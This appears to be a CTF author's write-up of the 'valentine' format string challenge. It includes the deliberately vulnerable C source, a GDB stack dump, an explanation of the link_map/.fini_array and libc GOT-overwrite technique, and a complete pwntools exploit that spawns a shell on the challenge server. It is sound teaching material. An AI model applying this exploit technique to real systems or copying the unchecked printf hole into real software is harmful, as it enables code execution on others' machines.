The premier matchmaking solution for the future.
nc valentine.chal.cubectf.com 42042
Last weekend, I helped to organize CubeCTF with some of my friends from the US Cyber Team. I worked with eoncrypt to create the challenge valentine
, which was a cool format string pwnable that required combining a few different tricks to solve. Originally, we wrote this challenge for an US Cyber Team potluck CTF that happened on Valentine’s day, hence the theming :P.
The challenge ended up being one of two unsolved challenges at the end of the CTF, but afterwards @white701 from UofTCTF solved it (albeit with an unintended solution 🙃).
Challenge overview
We provided players with the challenge source code, which is nicely commented! 😁
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
const char fmt[] = " ,d88b.d88b, \n"
" 88888888888 \n"
" 'Y8888888Y \n"
" 'Y888Y' \n"
" 'Y' \n"
"%*s \n"
" will u be mine?\n\n";
char* valentine;
int name_len, valentine_len;
int main() {
setbuf(stdin, NULL); // ignore
setbuf(stdout, NULL); // ignore
char name[24]; // sadly, you and your valentine
valentine = malloc(24); // are eternally separated by
// unmapped memory
printf("who is your valentine? ");
scanf("%23[^\n]%*c", valentine);
printf("what is your name? ");
scanf("%23[^\n]%*c", name);
name_len = strlen(name);
valentine_len = strlen(valentine);
if (name_len > 23 || valentine_len > 23) { // super secret proprietary algorithm
printf("unfortunately, %1s and %1s are not compatible.\n", name, valentine);
_exit(-1);
}
printf(name); // bridge the gap between you and your valentine
printf(", here is your card for %1s:\n\n", valentine);
printf(fmt, 24+valentine_len/2, valentine); // this isn't vulnerable i promise
return 0;
}
The vulnerability here is pretty clear; there’s an obvious format string vulnerability when the name
variable is printed out. There’s a bit of extra functionality: we control a 23-byte buffer on the heap (the valentine
variable) in addition to our 23-byte name
buffer on the stack. But the gist of the problem is simple: we must create a 23-byte format string payload that will lead to code execution.
Exploitation
To turn this format string vulnerability into code execution, we must have two things:
- An information leak, to bypass ASLR. This is because libc is loaded at a random address.
- A function pointer to overwrite, preferably with a controlled argument. This will allow us to call
system("sh")
.
One caveat–we only get one call to printf with the format string vulnerability. And at the time we have to supply our input, we do not know the location of libc. So really, our first step would be to get a second pass at the format string vulnerability. This means that we must get a leak, and at the same time, somehow call the main()
function again.
How can we do this? There are a few different ways–let’s list out a few ideas that come to mind:
- We could overwrite the GOT, but the only function called after our format string vulnerability is
printf
. And stack canaries are disabled, so overwriting__stack_chk_fail
is not an option. Overwritingprintf
would be useless, because we would destroy any future calls toprintf
, including any chance we had at getting to use the format string vulnerability again. - We could overwrite the return pointer on the stack using a technique like that used in still-printf or stiller-printf. But, that requires not using positional operators, meaning that we must have a long chain of format specifiers (i.e.
%c%c%c%c
) to access pointer chains further down the stack. Because we only have 23 bytes of space, this probably isn’t an option. - We could overwrite
.fini_array
, an array that holds the destructors for the binary, that runs on exit, like in this writeup. But that won’t work – in newer versions of GCC, .fini_array is placed in a read-only area of memory, even if only partial RELRO is enabled. So, we won’t have any luck overwriting.fini_array
.
Or will we?
link_map - the best format string target
When the linker sets up a function, in this version (and in many previous versions) of GLIBC, it pushes a pointer onto the stack, pointing to struct link_map. The following is the struct definition, found at https://man7.org/linux/man-pages/man3/dlinfo.3.html.
struct link_map {
ElfW(Addr) l_addr; /* Difference between the
address in the ELF file and
the address in memory */
char *l_name; /* Absolute pathname where
object was found */
ElfW(Dyn) *l_ld; /* Dynamic section of the
shared object */
struct link_map *l_next, *l_prev;
/* Chain of loaded objects */
/* Plus additional fields private to the
implementation */
};
With format string vulnerabilities, we have the %n
specifier, which lets us write to a pointer stored on the stack. Because there is a pointer to link_map
on the stack, we can write to the first 8 bytes of link_map
. This is the l_addr
field, which is the difference between the address in the ELF file and the address in memory where it is loaded. Because this binary is compiled without PIE, the addresses in memory are equal to the addresses in the binary, so l_addr
is initially 0
. But if we write to l_addr
, we shift by an arbitrary offset where the linker resolves objects to!
Here’s where .fini_array
comes in. It’s resolved by the linker during the exit sequence. But if l_addr
was changed, we can change where .fini_array
resolves to. This includes the page of writable memory (the .bss section) conveniently located right after .fini_array
in memory. So, by adding a small offset to l_addr
, we can change where .fini_array
is, and possibly point it somewhere we control.
Stage 1: Returning to main
, with a leak
To successfully return to main with a net gain of information, we must do three things:
- Shift the location of
.fini_array
to writable memory in the.bss
section by writing an offset tol_addr
. We choose.bss
because it is at a constant offset from the original location of.fini_array
, and is located after the original location in memory. - Write the address of
main
to the new location of.fini_array
. - Get a libc address printed out so that we can defeat ASLR.
That’s a lot to get done in only 23 characters of format string! There’s some information we need before we get our format string, so we go to GDB and set a breakpoint at the vulnerable printf
call. Then, we can view the stack:
$rsp 0x7fffffffdd38|+0x0000|+000: 0x00000000004012f6 <main+0x120> -> 0x4800002d63058b48 <- retaddr[1]
$rdi 0x7fffffffdd40|+0x0008|+001: 0x732074616d726f66 'format string goes here'
0x7fffffffdd48|+0x0010|+002: 0x6f6720676e697274 'tring goes here'
0x7fffffffdd50|+0x0018|+003: 0x0065726568207365 ('es here'?)
0x7fffffffdd58|+0x0020|+004: 0x0000000000000000
$rbp 0x7fffffffdd60|+0x0028|+005: 0x0000000000000001
0x7fffffffdd68|+0x0030|+006: 0x00007ffff7ddd510 -> 0xe80001b0e9e8c789 <- retaddr[2]
0x7fffffffdd70|+0x0038|+007: 0x0000000000000000
0x7fffffffdd78|+0x0040|+008: 0x00000000004011d6 <main> -> 0xe5894855fa1e0ff3
0x7fffffffdd80|+0x0048|+009: 0x0000000100000000
0x7fffffffdd88|+0x0050|+010: 0x00007fffffffde78 -> 0x00007fffffffe121 -> 0x752f632f746e6d2f '/mnt/c/users/ethan/downloads/valentine/vuln' <- $rbx
0x7fffffffdd90|+0x0058|+011: 0x00007fffffffde78 -> 0x00007fffffffe121 -> 0x752f632f746e6d2f '/mnt/c/users/ethan/downloads/valentine/vuln' <- $rbx
0x7fffffffdd98|+0x0060|+012: 0x56aeff2870d033e1
0x7fffffffdda0|+0x0068|+013: 0x0000000000000000
0x7fffffffdda8|+0x0070|+014: 0x00007fffffffde88 -> 0x00007fffffffe14d -> 0x622f3d4c4c454853 'SHELL=/bin/bash' <- $r13
0x7fffffffddb0|+0x0078|+015: 0x0000000000403e00 <__do_global_dtors_aux_fini_array_entry> -> 0x00000000004011a0 <__do_global_dtors_aux> -> 0x2ead3d80fa1e0ff3 <- $r14
0x7fffffffddb8|+0x0080|+016: 0x00007ffff7ffd020 <_rtld_global> -> 0x00007ffff7ffe2e0 -> 0x0000000000000000 <- $r15
0x7fffffffddc0|+0x0088|+017: 0xa95100d7ca3233e1
0x7fffffffddc8|+0x0090|+018: 0xa9511093d95a33e1
0x7fffffffddd0|+0x0098|+019: 0x0000000000000000
0x7fffffffddd8|+0x00a0|+020: 0x0000000000000000
0x7fffffffdde0|+0x00a8|+021: 0x0000000000000000
0x7fffffffdde8|+0x00b0|+022: 0x00007fffffffde78 -> 0x00007fffffffe121 -> 0x752f632f746e6d2f '/mnt/c/users/ethan/downloads/valentine/vuln' <- $rbx
0x7fffffffddf0|+0x00b8|+023: 0x00007fffffffde78 -> 0x00007fffffffe121 -> 0x752f632f746e6d2f '/mnt/c/users/ethan/downloads/valentine/vuln' <- $rbx
0x7fffffffddf8|+0x00c0|+024: 0x4a70c8164fec4b00 <- canary
0x7fffffffde00|+0x00c8|+025: 0x0000000000000000
0x7fffffffde08|+0x00d0|+026: 0x00007ffff7ddd5c9 <__libc_start_main+0x89> -> 0x4d001d29a03d8b4c <- retaddr[3]
0x7fffffffde10|+0x00d8|+027: 0x00000000004011d6 <main> -> 0xe5894855fa1e0ff3
0x7fffffffde18|+0x00e0|+028: 0x0000000000403e00 <__do_global_dtors_aux_fini_array_entry> -> 0x00000000004011a0 <__do_global_dtors_aux> -> 0x2ead3d80fa1e0ff3 <- $r14
0x7fffffffde20|+0x00e8|+029: 0x00007ffff7ffe2e0 -> 0x0000000000000000
With some experimentation, we get that the format string %6$p
returns back the start of our format string. With that index in mind, we find that the pointer to link_map
at 0x00007ffff7ffe2e0
can be accessed through index 34. We also notice that at 0x7fffffffdd78
, or index 13, there is a pointer to main
. This will come in handy later. Finally, we also can get the address of .fini_array
by running readelf -A ./vuln | grep .fini_array
, to get that it is at 0x403e00
.
So, our initial format string takes on the form "%4198870c%8$n%00000c%34$n" + p64(bss_address)
, with the first %c
being the address of main
, and the second %c
being how much we want to shift .fini_array
by (the 0
s are placeholders). However, this is too long, as we still need to fit in our 23 characters the address to write &main
to (referred to here as index 8). But as we noticed before, the address of main
is already on the stack! We can thus trim down characters here if we instead use the %*c
specifier to take the number of characters to print directly off the stack from index 13.
So, our format string becomes "%*13$c%8$n%34$hn" + p64(bss_address)
. We save additional space here by writing only 2 bytes to l_addr
, and by allowing the same value to be written to .bss
as to l_addr
. This is because we can control where &main
is written by changing the address we supply after the format string, so we just choose to write &main
to original_fini + &main & 0xffff
. This means that we do not need an extra %c
specifier, and save even more space. At this point, our format string is 16 + 8 = 24 bytes long, but we can truncate it by a byte because the last bytes are a pointer and should be null bytes (and scanf
’s %23[^\n]
specifier will add a 24th byte as a null terminator). So, we fit within the limit, and can call main
as the program exits!
But what about the leak? That’s actually pretty simple now because we get lucky with the register layout in the program. It turns out that the second “argument” to our vulnerable printf call (as it is uninitialized, this is just whatever happened to be in the rsi
register) happens to be a libc address! So, we change our first %c
to a %p
to get our final format string of "%*13$c%8$n%34$hn" + p64(bss_address)
.
With this, we have a working payload that when put into the name
input of the program, will lead to the main
function being called again, letting us exploit the format string again with a leak.
Stage 2: Arbitrary libc write to RCE
Now, our next step is to turn this into RCE. Our format string vulnerability basically gives us an arbitrary write, and because we have a leak of a libc address, we can write anywhere in libc.
To get code execution, we are going to control rdi
to call system("sh")
. Thankfully, the libc GOT is a good target for this. printf
will internally call strlen
on each of its string arguments, and it is a GOT entry in libc. Notice the third print statement below from vuln.c
.
Why not use a one_gadget?
As we were developing this challenge, I was working under the assumption that we would be using a newer version of libc, where one_gadgets tend to be pretty bad. Most of them use code fromposix_spawn
, which crashes the shell after a very short time (meaning that we have to win a weird race condition to send commands to the shell). However, it turned out that the pointer to link_map
no longer exists on the stack in newer versions of libc, so we ended up using an older libc that did have a nice execve
gadget. This was a little oversight that was later used in UofTCTF’s unintended solution.
printf(name); // bridge the gap between you and your valentine
printf(", here is your card for %1s:\n\n", valentine);
printf(fmt, 24+valentine_len/2, valentine);
In the last call to printf
here, at some point internally, strlen(valentine)
is called. Since we control the value of valentine
, if we overwrite strlen
with system
, we can call system("sh")
. We perform this overwrite with a simple format string writing payload, writing 4 bytes to partial overwrite strlen
to system
.
There’s a bit of a problem here, though: to overwrite a 4-byte value with a format string, we have to print the equivalent number of characters out to the terminal. This would mean writing a 32-bit number of whitespace characters and having the program send it over the network. This just won’t do; network latencies are too slow (and even if they aren’t, I’m too impatient), and the chances that my internet will drop out or I’ll hit some sort of timeout on the remote instance are just too high.
But here ASLR is our friend. Because memory addresses are randomized, the lower 32 bits of the address of system
will be randomized too! So, it is likely that by chance, those lower 32 bits will be a small number. And because we know the address of system
after getting our leak, we can just abort and try again if the address is too big, without having to print a massive number of characters if it is. Running our exploit in a loop until the last 4 bytes of the system address are below 0x10000000
ends being more time-efficient than waiting for one larger address to go through.
Putting it all together, we get our final solve script:
from pwn import *
context.binary = elf = ELF("./vuln")
libc = ELF("./libc.so.6")
done = False
while not done:
conn = remote("valentine.chal.cubectf.com", 42042)
conn.sendline(b"???")
conn.sendline(b"%*13$p%8$n%34$hn" + p64(0x403e00 + (elf.sym.main & 0xffff))[:-1])
conn.recvuntil(b"0x")
libc.address = int(conn.recv(12),16) - 0x1f6b03
to_write = libc.sym.system & 0xffffffff
info("libc @ " + hex(libc.address))
info("got @ " + hex(libc.address+0x1f6000))
info("to write: " + hex(to_write))
if to_write > 0x10000000 or to_write>>24 == 0xa:
conn.close()
continue
done = True
info("managable write, continuing")
conn.recvuntil(b"card for")
conn.sendline(b"sh")
conn.sendline(f"`%{(libc.sym.system & 0xffffffff)-2}c%8$n".encode().ljust(16,b"a") + p64(libc.address+0x1f6080)[:-1])
conn.sendline(b"echo hi")
conn.recvuntil(b"hi")
conn.interactive()
With that, we get our flag: cube{l0v3_will_find_4_w4y_thr0ugh_p4ths_wh3r3_w0lv3s_f34r_t0_pr3y_48699d8d2a8191fc}
(when you can’t come up with a flag, just find a random quote from one of the many quote websites out there)
Thanks to everyone who attempted this challenge; I hope you learned something cool from this challenge, even if you spent way too long banging your head against it. I personally find format string exploits as really fun puzzles, and I hope that you can too :)
Thanks also to B00TK1D for running this CTF smoothly and for providing so much of the admin support during the CTF. And thanks again to eoncrypt for helping write both the challenge and this blog post writeup!